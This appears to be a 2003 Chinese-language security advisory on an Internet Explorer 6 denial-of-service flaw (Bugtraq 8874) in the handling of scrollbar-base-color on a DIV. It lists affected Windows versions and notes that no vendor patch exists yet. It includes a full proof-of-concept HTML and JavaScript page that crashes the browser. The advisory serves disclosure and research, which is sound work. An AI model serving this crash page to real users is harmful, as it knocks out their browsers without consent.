发布日期：2003-10-22
更新日期：2003-10-28

受影响系统：

Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server

描述：

---

BUGTRAQ  ID: 8874

Microsoft Internet Explorer是一款流行的WEB浏览程序。

Microsoft Internet Explorer不正确处理DIV对象的scrollbar-base-color属性，远程攻击者可以利用这个漏洞对目标用户浏览器进行拒绝服务攻击。

攻击者可以构建包含畸形DIV对象的scrollbar-base-color属性的页面，诱使用户浏览器访问，可导致浏览器崩溃，产生拒绝服务攻击。

<*来源：Andreas Boeckler （abo@netlands.de）
  
  链接：http://www.securityfocus.com/archive/1/342010
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Andreas Boeckler （abo@netlands.de）提供了如下测试方法：

---snip---
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>CRASH-IE</title>
    <style type="text/css">
      html, body {
      overflow-y: hidden;
      scrollbar-base-color: '#330066';
      }
      
      .crash {
      position:absolute;
      left:200px;
      top:200px;
      width:200px;
      }

    </style>
    <script type="text/javascript">
function galgenfrist() {
      window.setTimeout('crashIE();',1000);
    }

function crashIE() {
    var moveNode = document.getElementById("move");
    if(moveNode) {
    moveNode.style.top = "100px";
    moveNode.style.left = "200px";
    }
}
    </script>
  </head>
  <body onload="galgenfrist();">
    <h1>CRASH-IE</h1>
    <div id="move" class="crash">
      <table>
    <tbody>
      <tr>
        <td>
          <textarea></textarea>
        </td>
      </tr>
    </tbody>
      </table>
    </div>
  </body>
</html>
---snap---

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：3359
严重程度：0（网友投票）